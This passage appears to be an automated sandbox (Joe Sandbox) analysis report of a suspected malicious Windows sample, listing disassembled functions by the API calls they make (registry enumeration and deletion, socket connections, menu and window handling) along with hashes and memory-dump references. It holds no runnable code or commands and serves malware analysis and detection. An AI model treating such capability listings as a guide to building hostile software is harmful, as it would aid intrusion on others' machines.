                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                              • String ID: \*.*
                              • API String ID: 1377345388-1173974218
                              • Opcode ID: 64f95b0a00c10a90708f8d8c5c6be68cbdb1a8eca7cfd807c5ed2f8514ed87ca
                              • Instruction ID: 5208bdda6515b1dc5811123a4be52c2447de8cfb0c081590a13859fed7791d55
                              • Opcode Fuzzy Hash: 64f95b0a00c10a90708f8d8c5c6be68cbdb1a8eca7cfd807c5ed2f8514ed87ca
                              • Instruction Fuzzy Hash: 05416DB24083849EC761EF69C4859DBB7E8FF8A340F10192EB499C3152EB75D688C752
                              Function 00907500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                              Download Yara Rule
                              APIs
                              • _memset.LIBCMT ref: 00907519
                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009075C0
                              • IsMenu.USER32(?), ref: 009075D8
                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00907620
                              • DrawMenuBar.USER32 ref: 00907633
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Menu$Item$DrawInfoInsert_memset
                              • String ID: 0
                              • API String ID: 3866635326-4108050209
                              • Opcode ID: 9c795faf01cc081a67f2cd83e553c50bcfb41660cdfdb600bd68354777c83e55
                              • Instruction ID: 9875ea033959298d9b67beb23a953e0030f25bee339c8ae95f1a717de6d20763
                              • Opcode Fuzzy Hash: 9c795faf01cc081a67f2cd83e553c50bcfb41660cdfdb600bd68354777c83e55
                              • Instruction Fuzzy Hash: 27414A75A04608EFDB20DF94D884EAABBF8FF05324F048029F91697290D731AD50DFA1
                              Function 0090122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0090125C
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00901286
                              • FreeLibrary.KERNEL32(00000000), ref: 0090133D
                                • Part of subcall function 0090122D: RegCloseKey.ADVAPI32(?), ref: 009012A3
                                • Part of subcall function 0090122D: FreeLibrary.KERNEL32(?), ref: 009012F5
                                • Part of subcall function 0090122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00901318
                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 009012E0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                              • String ID:
                              • API String ID: 395352322-0
                              • Opcode ID: 446a3ada143294340012bd2efac537eb9143a17aec924a8ce61e1d02981ad47a
                              • Instruction ID: 974a86a28d34efed373078a8cfbc8363af2e0110577dc1a775173a81794479b6
                              • Opcode Fuzzy Hash: 446a3ada143294340012bd2efac537eb9143a17aec924a8ce61e1d02981ad47a
                              • Instruction Fuzzy Hash: 25315CB1915109BFEB14DB94DC99EFFB7BCEF09300F000169E511E2581EB749F859AA0
                              Function 0090653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0090655B
                              • GetWindowLongW.USER32(01165BC0,000000F0), ref: 0090658E
                              • GetWindowLongW.USER32(01165BC0,000000F0), ref: 009065C3
                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 009065F5
                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0090661F
                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00906630
                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0090664A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: LongWindow$MessageSend
                              • String ID:
                              • API String ID: 2178440468-0
                              • Opcode ID: 48dd40e5bf1aca74760e9e04eb9665c84c2ce698189aac5c201e298db64a5e14
                              • Instruction ID: 775483ca1ec33792bdb35bd4a16708bdbb2227d47894767d9bf491e271b6e2dc
                              • Opcode Fuzzy Hash: 48dd40e5bf1aca74760e9e04eb9665c84c2ce698189aac5c201e298db64a5e14
                              • Instruction Fuzzy Hash: 28310075618214AFDB208F28DC89F553BE9FB4A714F1801A8F501CB2F6CB62A960EB41
                              Function 008F6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008F80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008F80CB
                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008F64D9
                              • WSAGetLastError.WSOCK32(00000000), ref: 008F64E8
                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 008F6521
                              • connect.WSOCK32(00000000,?,00000010), ref: 008F652A
                              • WSAGetLastError.WSOCK32 ref: 008F6534
                              • closesocket.WSOCK32(00000000), ref: 008F655D
                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 008F6576
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                              • String ID:
                              • API String ID: 910771015-0
                              • Opcode ID: e5e6fb5ecbdfc7e6e57f8488929e25e236d5c8984a3e9a13defaf33edfbf8f0a
                              • Instruction ID: 5ad11d4f11b1ebc1bb410c65989054c78dc85cd50bb929b8bd629fac64a5a4ce
                              • Opcode Fuzzy Hash: e5e6fb5ecbdfc7e6e57f8488929e25e236d5c8984a3e9a13defaf33edfbf8f0a
                              • Instruction Fuzzy Hash: 8A31B33160011CAFDB10AF64CC85BBE7BA9FB44714F048169FE46E7291EB70AD14DBA2
                              Function 008DE0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                              Download Yara Rule
                              APIs
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008DE0FA
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008DE120
                              • SysAllocString.OLEAUT32(00000000), ref: 008DE123
                              • SysAllocString.OLEAUT32 ref: 008DE144
                              • SysFreeString.OLEAUT32 ref: 008DE14D
                              • StringFromGUID2.OLE32(?,?,00000028), ref: 008DE167
                              • SysAllocString.OLEAUT32(?), ref: 008DE175
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                              • String ID:
                              • API String ID: 3761583154-0
                              • Opcode ID: be3ed19bf1e4bb24ae9bbace3dd10e0898e52ff5491c445993c597f65d45bd8f
                              • Instruction ID: 90481273abc441c6c4ffb37967d3f236cf85a6686e392539c29b27c6a0705b79
                              • Opcode Fuzzy Hash: be3ed19bf1e4bb24ae9bbace3dd10e0898e52ff5491c445993c597f65d45bd8f
                              • Instruction Fuzzy Hash: 17213235604208AFDF20AFA8DC88DAB77ADFB09760B108226F955CB660DA70DD419B64
                              Function 0090783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00881D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00881D73
                                • Part of subcall function 00881D35: GetStockObject.GDI32(00000011), ref: 00881D87
                                • Part of subcall function 00881D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00881D91
                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009078A1
                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009078AE
                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009078B9
                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009078C8
                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009078D4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$CreateObjectStockWindow
                              • String ID: Msctls_Progress32
                              • API String ID: 1025951953-3636473452
                              • Opcode ID: 45674916aad674e9c7d9f28f8b4e6e70a5869568097598799963cc256563d477
                              • Instruction ID: 1a1ce6ffeb272801590325e0c94039995a3b99d78ca89a4f70da820b9f26c0bc
                              • Opcode Fuzzy Hash: 45674916aad674e9c7d9f28f8b4e6e70a5869568097598799963cc256563d477
                              • Instruction Fuzzy Hash: F811B6B2514219BFEF159F60CC85EE77F5DEF48768F018114FA04A2090C772AC21DBA0
                              Function 008A41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,008A4292,?), ref: 008A41E3
                              • GetProcAddress.KERNEL32(00000000), ref: 008A41EA
                              • EncodePointer.KERNEL32(00000000), ref: 008A41F6
                              • DecodePointer.KERNEL32(00000001,008A4292,?), ref: 008A4213
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                              • String ID: RoInitialize$combase.dll
                              • API String ID: 3489934621-340411864
                              • Opcode ID: 54a7d21f299d0cd1f1d5722199ce3ca291d882c3667d257f2929df40abf8aaaf
                              • Instruction ID: 0bd4d042148d1c881cc35ff4bc2bfe17cbea778dce8db2905e4fb8bdc406cde5
                              • Opcode Fuzzy Hash: 54a7d21f299d0cd1f1d5722199ce3ca291d882c3667d257f2929df40abf8aaaf
                              • Instruction Fuzzy Hash: 5BE0E5B86B8744AEEB206BB0EC19F443AA4B7AAB46F109424B421E54E0DBB555D5AA00
                              Function 008A429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,008A41B8), ref: 008A42B8
                              • GetProcAddress.KERNEL32(00000000), ref: 008A42BF
                              • EncodePointer.KERNEL32(00000000), ref: 008A42CA
                              • DecodePointer.KERNEL32(008A41B8), ref: 008A42E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                              • String ID: RoUninitialize$combase.dll
                              • API String ID: 3489934621-2819208100
                              • Opcode ID: 5cb3b7a6ae022567cb01f1941fdebf0b73e2e3a5f2872093f929d507415d5ae4
                              • Instruction ID: 5d4e5b4c462c316eb0a4b3c1bd4a9b7a97b780d2014156f00b3ecfccf2825a5b
                              • Opcode Fuzzy Hash: 5cb3b7a6ae022567cb01f1941fdebf0b73e2e3a5f2872093f929d507415d5ae4
                              • Instruction Fuzzy Hash: F6E0BF7C66D3019FEB209B60FD1EF443AA4F769B46F205034F011E58A0CBB54694FB14
                              Function 008E675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memmove$__itow__swprintf
                              • String ID:
                              • API String ID: 3253778849-0
                              • Opcode ID: ab4eb5b95743a44d51d7fadd3155ba3afd48b97ef46ff4ca0970a978f0b83e01
                              • Instruction ID: ebdfd24a58964f9778a096f488cfb7f7840bcfda2c6d43044ff16272c06b1d91
                              • Opcode Fuzzy Hash: ab4eb5b95743a44d51d7fadd3155ba3afd48b97ef46ff4ca0970a978f0b83e01
                              • Instruction Fuzzy Hash: F0618A3050069A9BDF11FF29CC81EFE3BA4FF56348F084519F8959B292EA34AD51CB52
                              Function 0090046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                • Part of subcall function 009010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00900038,?,?), ref: 009010BC
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00900548
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00900588
                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 009005AB
                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009005D4
                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00900617
                              • RegCloseKey.ADVAPI32(00000000), ref: 00900624
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                              • String ID:
                              • API String ID: 4046560759-0
                              • Opcode ID: ac6f17ceb106fee27ea20b9c2f1ef9eafdfb02e77ea994c5a6f5feab19808d85
                              • Instruction ID: 80c7b07dbfd8611953a514d6712223e020e9f759568859251d274f3c46c6a807
                              • Opcode Fuzzy Hash: ac6f17ceb106fee27ea20b9c2f1ef9eafdfb02e77ea994c5a6f5feab19808d85
                              • Instruction Fuzzy Hash: D7514731208200AFDB14EB28C885E6EBBF9FF89714F04492DF595972A1DB31EA04DB52
                              Function 00905A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetMenu.USER32(?), ref: 00905A82
                              • GetMenuItemCount.USER32(00000000), ref: 00905AB9
                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00905AE1
                              • GetMenuItemID.USER32(?,?), ref: 00905B50
                              • GetSubMenu.USER32(?,?), ref: 00905B5E
                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 00905BAF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Menu$Item$CountMessagePostString
                              • String ID:
                              • API String ID: 650687236-0
                              • Opcode ID: 13c6c4750b3fefdc22937d329490a022a1cc15af3e10213f04124c57dfcb5936
                              • Instruction ID: 45a0a847dc5e9f07852c1efb990a81c48985a08d0f68327c731c62a8e014a19f
                              • Opcode Fuzzy Hash: 13c6c4750b3fefdc22937d329490a022a1cc15af3e10213f04124c57dfcb5936
                              • Instruction Fuzzy Hash: 35515C35A00619AFDB11EFA8C845AAEBBB4FF48310F154469E852E7391CB74AE41CF91
                              Function 008DF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                              Download Yara Rule
                              APIs
                              • VariantInit.OLEAUT32(?), ref: 008DF3F7
                              • VariantClear.OLEAUT32(00000013), ref: 008DF469
                              • VariantClear.OLEAUT32(00000000), ref: 008DF4C4
                              • _memmove.LIBCMT ref: 008DF4EE
                              • VariantClear.OLEAUT32(?), ref: 008DF53B
                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 008DF569
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Variant$Clear$ChangeInitType_memmove
                              • String ID:
                              • API String ID: 1101466143-0
                              • Opcode ID: 30aa81a10de89e2f08e6c912ce081ccfbfc75c2343b528edde0d8bca05a0d397
                              • Instruction ID: 5cb52ddaecf2cd2d0871b4f9d09d416b2fbe47a04026076ad2b9202ffd251f73
                              • Opcode Fuzzy Hash: 30aa81a10de89e2f08e6c912ce081ccfbfc75c2343b528edde0d8bca05a0d397
                              • Instruction Fuzzy Hash: 84516AB5A00209EFCB10CF58D884AAAB7F9FF4C314B15816AEE59DB311D730E951CBA0
                              Function 008E26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                              Download Yara Rule
                              APIs
                              • _memset.LIBCMT ref: 008E2747
                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E2792
                              • IsMenu.USER32(00000000), ref: 008E27B2
                              • CreatePopupMenu.USER32 ref: 008E27E6
                              • GetMenuItemCount.USER32(000000FF), ref: 008E2844
                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 008E2875
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                              • String ID:
                              • API String ID: 3311875123-0
                              • Opcode ID: 190ea18e37b38799b7a1a78de091952d225a98776b543ce2c742fe90b2b6a46c
                              • Instruction ID: 50288e62baad466868a0fb0e22420a81b30e72e09fd6856fd2cdf11daafce5ed
                              • Opcode Fuzzy Hash: 190ea18e37b38799b7a1a78de091952d225a98776b543ce2c742fe90b2b6a46c
                              • Instruction Fuzzy Hash: 1151A370900399DFDF24CF6AD888AAEBBF9FF46314F104169E825DB291D7709944CB52
                              Function 00881765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 0088179A
                              • GetWindowRect.USER32(?,?), ref: 008817FE
                              • ScreenToClient.USER32(?,?), ref: 0088181B
                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0088182C
                              • EndPaint.USER32(?,?), ref: 00881876
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                              • String ID:
                              • API String ID: 1827037458-0
                              • Opcode ID: d6b582e56d984c25108643019ffabbbb4bc07c4281f51958f1f036d6aed4d705
                              • Instruction ID: 8d3346a2bc242a433b3314be7a16250a241a8ba592473d41469679f0a9574d1c
                              • Opcode Fuzzy Hash: d6b582e56d984c25108643019ffabbbb4bc07c4281f51958f1f036d6aed4d705
                              • Instruction Fuzzy Hash: E24192705083059FDB20EF24CC89FB67BE8FB4A724F140629F554C72A1CB719946EB62
                              Function 0090B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                              Download Yara Rule
                              APIs
                              • ShowWindow.USER32(009467B0,00000000,01165BC0,?,?,009467B0,?,0090B862,?,?), ref: 0090B9CC
                              • EnableWindow.USER32(00000000,00000000), ref: 0090B9F0
                              • ShowWindow.USER32(009467B0,00000000,01165BC0,?,?,009467B0,?,0090B862,?,?), ref: 0090BA50
                              • ShowWindow.USER32(00000000,00000004,?,0090B862,?,?), ref: 0090BA62
                              • EnableWindow.USER32(00000000,00000001), ref: 0090BA86
                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0090BAA9
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
